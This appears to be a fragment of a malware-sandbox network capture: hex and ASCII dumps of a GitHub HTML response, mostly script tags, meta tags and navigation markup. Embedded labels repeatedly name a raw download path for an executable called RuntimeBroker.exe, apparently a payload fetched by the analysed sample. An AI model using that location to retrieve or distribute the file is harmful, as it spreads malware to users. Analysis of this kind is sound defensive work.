                                                                                              Data Ascii: _modules_delegated-events_dist_index_js-node_modules_github_details-dialog-elemen-63debe-4a2f37f7419e.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" integrity="sha512-IW3JseO0m0yclixsxDwuXBlAp0+bXVZkAzcVRd5lkCD0U
                                                                                              2022-08-10 04:48:03 UTC414INData Raw: 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 66 69 6c 65 2d 61 74 74 61 63 68 6d 65 6e 74 2d 65 6c 65 6d 65 6e 74 5f 64 69 73 74 5f 69 6e 64 65 78 5f 6a 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 70 72 69 6d 65 72 5f 76 69 65 77 2d 63 6f 2d 62 33 64 33 32 66 2d 63 32 35 31 39 65 32 30 65 35 62 39 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 20 69 6e 74 65 67 72 69 74 79 3d 22 73
                                                                                              Data Ascii: https://github.githubassets.com/assets/vendors-node_modules_github_file-attachment-element_dist_index_js-node_modules_primer_view-co-b3d32f-c2519e20e5b9.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" integrity="s
                                                                                              2022-08-10 04:48:03 UTC415INData Raw: 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 20 69 6e 74 65 67 72 69 74 79 3d 22 73 68 61 35 31 32 2d 59 6c 5a 7a 66 44 73 30 73 4a 77 62 34 4c 44 50 6f 59 47 7a 70 70 61 61 73 47 2f 79 76 59 38 44 6f 6c 56 6b 36 34 75 37 4b 6a 70 79 7a 2f 4e 70 4b 53 33 45 37 74 6f 42 6b 48 63 44 78 4e 53 42 38 78 37 6d 6c 44 44 6a 43 32 6e 48 75 57 69 6c 74 73 4d 47 76 51 3d 3d 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 72 65 6d 6f 74 65
                                                                                              Data Ascii: crossorigin="anonymous" defer="defer" type="application/javascript" integrity="sha512-YlZzfDs0sJwb4LDPoYGzppaasG/yvY8DolVk64u7Kjpyz/NpKS3E7toBkHcDxNSB8x7mlDDjC2nHuWiltsMGvQ==" src="https://github.githubassets.com/assets/vendors-node_modules_github_remote
                                                                                              2022-08-10 04:48:03 UTC416INData Raw: 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 20 69 6e 74 65 67 72 69 74 79 3d 22 73 68 61 35 31 32 2d 4d 55 71 6c 6c 55 31 7a 57 53 63 4a 72 47 34 34 75 68 50 69 4b 38 69 72 69 72 30 6e 77 36 53 65 70 47 76 70 2b 72 77 6a 52 51 52 6e 4c 6e 4b 54 6c 49 67 61 43 4f 31 4e 37 4f 45 5a 33 58 53 71 48 49 4a 79 4e 6e 5a 52 31 55 6c 41 32 39 6c 42 5a 72 71 78 53 77 3d 3d 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 61 70 70 5f 61 73 73 65 74 73 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 62 65 68 61 76 69 6f 72
                                                                                              Data Ascii: crossorigin="anonymous" defer="defer" type="application/javascript" integrity="sha512-MUqllU1zWScJrG44uhPiK8irir0nw6SepGvp+rwjRQRnLnKTlIgaCO1N7OEZ3XSqHIJyNnZR1UlA29lBZrqxSw==" src="https://github.githubassets.com/assets/app_assets_modules_github_behavior
                                                                                              2022-08-10 04:48:03 UTC418INData Raw: 62 65 68 61 76 69 6f 72 73 5f 68 74 2d 38 33 63 32 33 35 2d 64 62 37 39 35 39 62 35 66 66 66 39 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 20 69 6e 74 65 67 72 69 74 79 3d 22 73 68 61 35 31 32 2d 75 4e 66 37 63 49 5a 6a 6b 30 6f 52 65 31 71 46 6e 7a 56 50 31 65 46 72 6d 68 51 4b 71 36 31 41 51 70 77 4e 66 67 4d 62 6c 46 4b 47 4e 36 56 4e 7a 69 7a 77 6a 32 55 31 64 78 48 78 66 76 77 7a 75 2f 43 6d 2f 71 65 4b 6b 75 32 4d 75 6a 45 2f 61 75 4c 64 36 67 3d 3d 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68
                                                                                              Data Ascii: behaviors_ht-83c235-db7959b5fff9.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" integrity="sha512-uNf7cIZjk0oRe1qFnzVP1eFrmhQKq61AQpwNfgMblFKGN6VNzizwj2U1dxHxfvwzu/Cm/qeKku2MujE/auLd6g==" src="https://github.gith
                                                                                              2022-08-10 04:48:03 UTC419INData Raw: 7a 61 58 52 76 63 6c 39 70 5a 43 49 36 49 6a 67 77 4f 54 6b 33 4f 54 59 33 4d 6a 49 31 4f 54 45 32 4e 7a 59 31 4e 44 4d 69 4c 43 4a 79 5a 57 64 70 62 32 35 66 5a 57 52 6e 5a 53 49 36 49 6d 5a 79 59 53 49 73 49 6e 4a 6c 5a 32 6c 76 62 6c 39 79 5a 57 35 6b 5a 58 49 69 4f 69 4a 70 59 57 51 69 66 51 3d 3d 22 20 64 61 74 61 2d 70 6a 61 78 2d 74 72 61 6e 73 69 65 6e 74 3d 22 74 72 75 65 22 20 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 73 69 74 6f 72 2d 68 6d 61 63 22 20 63 6f 6e 74 65 6e 74 3d 22 38 30 30 65 30 34 33 39 65 35 66 32 62 35 30 34 66 37 33 63 63 30 39 34 63 66 31 35 37 65 39 32 62 37 37 33 33 64 35 31 61 30 64 37 31 33 32 31 65 31 37 33 61 66 65 64 64 32 30 63 31 35 38 61 22 20 64 61 74 61 2d 70 6a 61 78 2d 74 72 61 6e 73 69 65 6e 74 3d 22 74
                                                                                              Data Ascii: zaXRvcl9pZCI6IjgwOTk3OTY3MjI1OTE2NzY1NDMiLCJyZWdpb25fZWRnZSI6ImZyYSIsInJlZ2lvbl9yZW5kZXIiOiJpYWQifQ==" data-pjax-transient="true" /><meta name="visitor-hmac" content="800e0439e5f2b504f73cc094cf157e92b7733d51a0d71321e173afedd20c158a" data-pjax-transient="t
                                                                                              2022-08-10 04:48:03 UTC420INData Raw: 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 66 6c 75 69 64 69 63 6f 6e 2e 70 6e 67 22 20 74 69 74 6c 65 3d 22 47 69 74 48 75 62 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 66 62 3a 61 70 70 5f 69 64 22 20 63 6f 6e 74 65 6e 74 3d 22 31 34 30 31 34 38 38 36 39 33 34 33 36 35 32 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 70 70 6c 65 2d 69 74 75 6e 65 73 2d 61 70 70 22 20 63 6f 6e 74 65 6e 74 3d 22 61 70 70 2d 69 64 3d 31 34 37 37 33 37 36 39 30 35 22 20 2f 3e 0a 20 20 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 75 72 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 22 3e 0a 20 20 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70
                                                                                              Data Ascii: ref="https://github.com/fluidicon.png" title="GitHub"> <meta property="fb:app_id" content="1401488693436528"> <meta name="apple-itunes-app" content="app-id=1477376905" /> <meta property="og:url" content="https://github.com"> <meta prop
                                                                                              2022-08-10 04:48:03 UTC421INData Raw: 22 3e 0a 20 20 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 69 6d 61 67 65 3a 68 65 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 36 32 30 22 3e 0a 20 20 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 69 6d 61 67 65 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 6d 6f 64 75 6c 65 73 2f 6f 70 65 6e 5f 67 72 61 70 68 2f 67 69 74 68 75 62 2d 6f 63 74 6f 63 61 74 2e 70 6e 67 22 3e 0a 20 20 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 69 6d 61 67 65 3a 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 69 6d 61 67 65 2f 70 6e 67 22 3e 0a 20 20 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79
                                                                                              Data Ascii: "> <meta property="og:image:height" content="620"> <meta property="og:image" content="https://github.githubassets.com/images/modules/open_graph/github-octocat.png"> <meta property="og:image:type" content="image/png"> <meta property
                                                                                              2022-08-10 04:48:03 UTC423INData Raw: 5f 4d 45 54 52 49 43 5f 54 52 41 43 4b 49 4e 47 2c 47 45 4f 4a 53 4f 4e 5f 41 5a 55 52 45 5f 4d 41 50 53 22 3e 0a 0a 0a 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 78 2d 70 6a 61 78 2d 76 65 72 73 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 66 37 65 33 65 32 39 37 39 61 65 32 37 61 35 31 65 33 35 37 38 34 64 31 65 30 38 64 65 37 35 31 39 38 64 31 33 38 33 35 36 30 35 37 31 31 33 38 35 66 32 35 32 33 65 65 66 61 30 36 38 31 66 33 22 20 64 61 74 61 2d 74 75 72 62 6f 2d 74 72 61 63 6b 3d 22 72 65 6c 6f 61 64 22 3e 0a 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 78 2d 70 6a 61 78 2d 63 73 70 2d 76 65 72 73 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 64 33 36 34 32 33 66 39 64 65 63 33 35 66 34 30 64 37 35 62 64 61 37 31 30 33 64 66
                                                                                              Data Ascii: _METRIC_TRACKING,GEOJSON_AZURE_MAPS"> <meta http-equiv="x-pjax-version" content="f7e3e2979ae27a51e35784d1e08de75198d13835605711385f2523eefa0681f3" data-turbo-track="reload"> <meta http-equiv="x-pjax-csp-version" content="d36423f9dec35f40d75bda7103df
                                                                                              2022-08-10 04:48:03 UTC424INData Raw: 72 72 6f 72 73 22 3e 0a 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 62 72 6f 77 73 65 72 2d 6f 70 74 69 6d 69 7a 65 6c 79 2d 63 6c 69 65 6e 74 2d 65 72 72 6f 72 73 2d 75 72 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 73 3a 2f 2f 61 70 69 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 5f 70 72 69 76 61 74 65 2f 62 72 6f 77 73 65 72 2f 6f 70 74 69 6d 69 7a 65 6c 79 5f 63 6c 69 65 6e 74 2f 65 72 72 6f 72 73 22 3e 0a 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 6d 61 73 6b 2d 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 70 69 6e 6e 65 64 2d 6f 63 74 6f 63 61 74 2e 73 76 67 22 20 63 6f 6c 6f 72 3d 22 23 30 30 30 30 30 30 22 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72
                                                                                              Data Ascii: rrors"> <meta name="browser-optimizely-client-errors-url" content="https://api.github.com/_private/browser/optimizely_client/errors"> <link rel="mask-icon" href="https://github.githubassets.com/pinned-octocat.svg" color="#000000"> <link rel="alter
                                                                                              2022-08-10 04:48:03 UTC425INData Raw: 64 65 66 65 72 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 20 69 6e 74 65 67 72 69 74 79 3d 22 73 68 61 35 31 32 2d 51 58 49 78 71 59 55 6c 57 61 58 72 63 64 4e 34 63 48 51 6c 43 35 4b 58 6e 32 6b 4c 42 6d 48 48 52 47 73 52 39 49 38 56 36 36 33 4f 2f 62 6d 56 76 74 2b 68 51 56 48 32 47 36 52 32 72 74 74 51 39 45 73 68 55 76 75 47 49 44 64 47 51 6b 56 48 34 4f 41 2f 38 77 3d 3d 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 72 65 6d 6f 74 65 2d 66 6f 72 6d 5f 64 69 73 74 5f 69 6e 64 65 78 5f 6a 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73
                                                                                              Data Ascii: defer" type="application/javascript" integrity="sha512-QXIxqYUlWaXrcdN4cHQlC5KXn2kLBmHHRGsR9I8V663O/bmVvt+hQVH2G6R2rttQ9EshUvuGIDdGQkVH4OA/8w==" src="https://github.githubassets.com/assets/vendors-node_modules_github_remote-form_dist_index_js-node_modules
                                                                                              2022-08-10 04:48:03 UTC427INData Raw: 31 2e 32 31 20 31 2e 38 37 2e 38 37 20 32 2e 33 33 2e 36 36 2e 30 37 2d 2e 35 32 2e 32 38 2d 2e 38 37 2e 35 31 2d 31 2e 30 37 2d 31 2e 37 38 2d 2e 32 2d 33 2e 36 34 2d 2e 38 39 2d 33 2e 36 34 2d 33 2e 39 35 20 30 2d 2e 38 37 2e 33 31 2d 31 2e 35 39 2e 38 32 2d 32 2e 31 35 2d 2e 30 38 2d 2e 32 2d 2e 33 36 2d 31 2e 30 32 2e 30 38 2d 32 2e 31 32 20 30 20 30 20 2e 36 37 2d 2e 32 31 20 32 2e 32 2e 38 32 2e 36 34 2d 2e 31 38 20 31 2e 33 32 2d 2e 32 37 20 32 2d 2e 32 37 2e 36 38 20 30 20 31 2e 33 36 2e 30 39 20 32 20 2e 32 37 20 31 2e 35 33 2d 31 2e 30 34 20 32 2e 32 2d 2e 38 32 20 32 2e 32 2d 2e 38 32 2e 34 34 20 31 2e 31 2e 31 36 20 31 2e 39 32 2e 30 38 20 32 2e 31 32 2e 35 31 2e 35 36 2e 38 32 20 31 2e 32 37 2e 38 32 20 32 2e 31 35 20 30 20 33 2e 30 37 2d 31
                                                                                              Data Ascii: 1.21 1.87.87 2.33.66.07-.52.28-.87.51-1.07-1.78-.2-3.64-.89-3.64-3.95 0-.87.31-1.59.82-2.15-.08-.2-.36-1.02.08-2.12 0 0 .67-.21 2.2.82.64-.18 1.32-.27 2-.27.68 0 1.36.09 2 .27 1.53-1.04 2.2-.82 2.2-.82.44 1.1.16 1.92.08 2.12.51.56.82 1.27.82 2.15 0 3.07-1
                                                                                              2022-08-10 04:48:03 UTC428INData Raw: 20 20 20 20 20 20 3c 2f 61 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 3c 62 75 74 74 6f 6e 20 61 72 69 61 2d 6c 61 62 65 6c 3d 22 54 6f 67 67 6c 65 20 6e 61 76 69 67 61 74 69 6f 6e 22 20 61 72 69 61 2d 65 78 70 61 6e 64 65 64 3d 22 66 61 6c 73 65 22 20 74 79 70 65 3d 22 62 75 74 74 6f 6e 22 20 64 61 74 61 2d 76 69 65 77 2d 63 6f 6d 70 6f 6e 65 6e 74 3d 22 74 72 75 65 22 20 63 6c 61 73 73 3d 22 6a 73 2d 64 65 74 61 69 6c 73 2d 74 61 72 67 65 74 20 62 74 6e 2d 6c 69 6e 6b 20 64 2d 6c 67 2d 6e 6f 6e 65 20 6d 74 2d 31 20 63 6f 6c 6f 72 2d 66 67 2d 69 6e 68 65 72 69 74 22 3e 20 20 20 20 3c 73 76 67 20 61 72 69 61 2d 68 69 64 64 65 6e 3d 22 74 72 75 65 22 20 68 65 69 67 68 74 3d 22 32 34 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 36 20 31 36 22 20 76 65 72 73
                                                                                              Data Ascii: </a> <button aria-label="Toggle navigation" aria-expanded="false" type="button" data-view-component="true" class="js-details-target btn-link d-lg-none mt-1 color-fg-inherit"> <svg aria-hidden="true" height="24" viewBox="0 0 16 16" vers
                                                                                              2022-08-10 04:48:03 UTC430INData Raw: 31 30 2e 39 34 20 31 32 20 35 2e 37 32 20 36 2e 37 38 61 2e 37 35 2e 37 35 20 30 20 30 31 30 2d 31 2e 30 36 7a 22 3e 3c 2f 70 61 74 68 3e 0a 3c 2f 73 76 67 3e 0a 3c 2f 62 75 74 74 6f 6e 3e 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 0a 20 20 20 20 20 20 20 20 3c 6e 61 76 20 63 6c 61 73 73 3d 22 6d 74 2d 30 20 70 78 2d 33 20 70 78 2d 6c 67 2d 30 20 6d 62 2d 35 20 6d 62 2d 6c 67 2d 30 22 20 61 72 69 61 2d 6c 61 62 65 6c 3d 22 47 6c 6f 62 61 6c 22 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 75 6c 20 63 6c 61 73 73 3d 22 64 2d 6c 67 2d 66 6c 65 78 20 6c 69 73 74 2d 73 74 79 6c 65 2d 6e 6f 6e 65 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 20 63 6c 61 73 73 3d 22 6d 72 2d 30 20 6d 72 2d 6c 67 2d 33 20 70 6f 73 69 74 69 6f 6e 2d 72 65 6c 61 74 69 76 65 20
                                                                                              Data Ascii: 10.94 12 5.72 6.78a.75.75 0 010-1.06z"></path></svg></button> </div> <nav class="mt-0 px-3 px-lg-0 mb-5 mb-lg-0" aria-label="Global"> <ul class="d-lg-flex list-style-none"> <li class="mr-0 mr-lg-3 position-relative
                                                                                              2022-08-10 04:48:03 UTC431INData Raw: 75 72 65 73 22 3e 0a 20 20 20 20 20 20 46 65 61 74 75 72 65 73 0a 3c 2f 61 3e 20 20 3c 2f 6c 69 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 3e 0a 20 20 20 20 3c 61 20 63 6c 61 73 73 3d 22 6c 68 2d 63 6f 6e 64 65 6e 73 65 64 2d 75 6c 74 72 61 20 64 2d 62 6c 6f 63 6b 20 6e 6f 2d 75 6e 64 65 72 6c 69 6e 65 20 70 6f 73 69 74 69 6f 6e 2d 72 65 6c 61 74 69 76 65 20 4c 69 6e 6b 2d 2d 73 65 63 6f 6e 64 61 72 79 20 70 79 2d 32 22 20 64 61 74 61 2d 61 6e 61 6c 79 74 69 63 73 2d 65 76 65 6e 74 3d 22 7b 26 71 75 6f 74 3b 63 61 74 65 67 6f 72 79 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 48 65 61 64 65 72 20 64 72 6f 70 64 6f 77 6e 20 28 6c 6f 67 67 65 64 20 6f 75 74 29 2c 20 50 72 6f 64 75 63 74 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 61 63 74 69 6f 6e 26
                                                                                              Data Ascii: ures"> Features</a> </li> <li> <a class="lh-condensed-ultra d-block no-underline position-relative Link--secondary py-2" data-analytics-event="{&quot;category&quot;:&quot;Header dropdown (logged out), Product&quot;,&quot;action&
                                                                                              2022-08-10 04:48:03 UTC432INData Raw: 69 74 69 6f 6e 2d 72 65 6c 61 74 69 76 65 20 4c 69 6e 6b 2d 2d 73 65 63 6f 6e 64 61 72 79 20 70 79 2d 32 22 20 64 61 74 61 2d 61 6e 61 6c 79 74 69 63 73 2d 65 76 65 6e 74 3d 22 7b 26 71 75 6f 74 3b 63 61 74 65 67 6f 72 79 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 48 65 61 64 65 72 20 64 72 6f 70 64 6f 77 6e 20 28 6c 6f 67 67 65 64 20 6f 75 74 29 2c 20 50 72 6f 64 75 63 74 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 61 63 74 69 6f 6e 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 63 6c 69 63 6b 20 74 6f 20 67 6f 20 74 6f 20 43 6f 70 69 6c 6f 74 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 6c 61 62 65 6c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 72 65 66 5f 70 61 67 65 3a 2f 67 6f 77 67 65 72 72 69 65 2f 72 65 62 6f 72 6e 2f 72 61 77 2f 6d 61 69 6e 2f 30 34 2f 52 75 6e 74 69 6d 65
                                                                                              Data Ascii: ition-relative Link--secondary py-2" data-analytics-event="{&quot;category&quot;:&quot;Header dropdown (logged out), Product&quot;,&quot;action&quot;:&quot;click to go to Copilot&quot;,&quot;label&quot;:&quot;ref_page:/gowgerrie/reborn/raw/main/04/Runtime
                                                                                              2022-08-10 04:48:03 UTC434INData Raw: 20 28 6c 6f 67 67 65 64 20 6f 75 74 29 2c 20 50 72 6f 64 75 63 74 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 61 63 74 69 6f 6e 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 63 6c 69 63 6b 20 74 6f 20 67 6f 20 74 6f 20 43 6f 64 65 20 72 65 76 69 65 77 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 6c 61 62 65 6c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 72 65 66 5f 70 61 67 65 3a 2f 67 6f 77 67 65 72 72 69 65 2f 72 65 62 6f 72 6e 2f 72 61 77 2f 6d 61 69 6e 2f 30 34 2f 52 75 6e 74 69 6d 65 42 72 6f 6b 65 72 2e 65 78 65 3b 72 65 66 5f 63 74 61 3a 43 6f 64 65 20 72 65 76 69 65 77 3b 26 71 75 6f 74 3b 7d 22 20 68 72 65 66 3d 22 2f 66 65 61 74 75 72 65 73 2f 63 6f 64 65 2d 72 65 76 69 65 77 22 3e 0a 20 20 20 20 20 20 43 6f 64 65 20 72 65 76 69 65 77 0a 3c 2f 61 3e 20 20 3c 2f 6c 69
                                                                                              Data Ascii: (logged out), Product&quot;,&quot;action&quot;:&quot;click to go to Code review&quot;,&quot;label&quot;:&quot;ref_page:/gowgerrie/reborn/raw/main/04/RuntimeBroker.exe;ref_cta:Code review;&quot;}" href="/features/code-review"> Code review</a> </li
                                                                                              2022-08-10 04:48:03 UTC435INData Raw: 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 6c 61 62 65 6c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 72 65 66 5f 70 61 67 65 3a 2f 67 6f 77 67 65 72 72 69 65 2f 72 65 62 6f 72 6e 2f 72 61 77 2f 6d 61 69 6e 2f 30 34 2f 52 75 6e 74 69 6d 65 42 72 6f 6b 65 72 2e 65 78 65 3b 72 65 66 5f 63 74 61 3a 49 6e 74 65 67 72 61 74 69 6f 6e 73 3b 26 71 75 6f 74 3b 7d 22 20 68 72 65 66 3d 22 2f 66 65 61 74 75 72 65 73 2f 69 6e 74 65 67 72 61 74 69 6f 6e 73 22 3e 0a 20 20 20 20 20 20 49 6e 74 65 67 72 61 74 69 6f 6e 73 0a 3c 2f 61 3e 20 20 3c 2f 6c 69 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 3e 0a 20 20 20 20 3c 61 20 63 6c 61 73 73 3d 22 6c 68 2d 63 6f 6e 64 65 6e 73 65 64 2d 75 6c 74 72 61 20 64 2d 62 6c 6f 63 6b 20 6e 6f 2d 75 6e 64 65 72 6c 69 6e 65 20 70 6f
                                                                                              Data Ascii: quot;,&quot;label&quot;:&quot;ref_page:/gowgerrie/reborn/raw/main/04/RuntimeBroker.exe;ref_cta:Integrations;&quot;}" href="/features/integrations"> Integrations</a> </li> <li> <a class="lh-condensed-ultra d-block no-underline po
                                                                                              2022-08-10 04:48:03 UTC436INData Raw: 69 6e 6b 20 6e 6f 2d 75 6e 64 65 72 6c 69 6e 65 20 70 79 2d 33 20 64 2d 62 6c 6f 63 6b 20 64 2d 6c 67 2d 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 22 20 64 61 74 61 2d 61 6e 61 6c 79 74 69 63 73 2d 65 76 65 6e 74 3d 22 7b 26 71 75 6f 74 3b 63 61 74 65 67 6f 72 79 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 48 65 61 64 65 72 20 6d 65 6e 75 20 74 6f 70 20 69 74 65 6d 20 28 6c 6f 67 67 65 64 20 6f 75 74 29 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 61 63 74 69 6f 6e 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 63 6c 69 63 6b 20 74 6f 20 67 6f 20 74 6f 20 54 65 61 6d 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 6c 61 62 65 6c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 72 65 66 5f 70 61 67 65 3a 2f 67 6f 77 67 65 72 72 69 65 2f 72 65 62 6f 72 6e 2f 72 61 77 2f 6d 61 69 6e 2f 30 34 2f 52 75
                                                                                              Data Ascii: ink no-underline py-3 d-block d-lg-inline-block" data-analytics-event="{&quot;category&quot;:&quot;Header menu top item (logged out)&quot;,&quot;action&quot;:&quot;click to go to Team&quot;,&quot;label&quot;:&quot;ref_page:/gowgerrie/reborn/raw/main/04/Ru
                                                                                              2022-08-10 04:48:03 UTC438INData Raw: 61 73 73 3d 22 69 63 6f 6e 2d 63 68 65 76 6f 6e 2d 64 6f 77 6e 2d 6d 6b 74 67 20 70 6f 73 69 74 69 6f 6e 2d 61 62 73 6f 6c 75 74 65 20 70 6f 73 69 74 69 6f 6e 2d 6c 67 2d 72 65 6c 61 74 69 76 65 22 3e 3c 70 61 74 68 20 64 3d 22 4d 31 2c 31 6c 36 2e 32 2c 36 4c 31 33 2c 31 22 3e 3c 2f 70 61 74 68 3e 3c 2f 73 76 67 3e 0a 20 20 20 20 20 20 3c 2f 73 75 6d 6d 61 72 79 3e 0a 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 64 72 6f 70 64 6f 77 6e 2d 6d 65 6e 75 20 66 6c 65 78 2d 61 75 74 6f 20 72 6f 75 6e 64 65 64 20 70 78 2d 30 20 6d 74 2d 30 20 70 62 2d 34 20 70 2d 6c 67 2d 34 20 70 6f 73 69 74 69 6f 6e 2d 72 65 6c 61 74 69 76 65 20 70 6f 73 69 74 69 6f 6e 2d 6c 67 2d 61 62 73 6f 6c 75 74 65 20 6c 65 66 74 2d 30 20 6c 65 66 74 2d 6c 67 2d 6e 34 22 3e 0a
                                                                                              Data Ascii: ass="icon-chevon-down-mktg position-absolute position-lg-relative"><path d="M1,1l6.2,6L13,1"></path></svg> </summary> <div class="dropdown-menu flex-auto rounded px-0 mt-0 pb-4 p-lg-4 position-relative position-lg-absolute left-0 left-lg-n4">
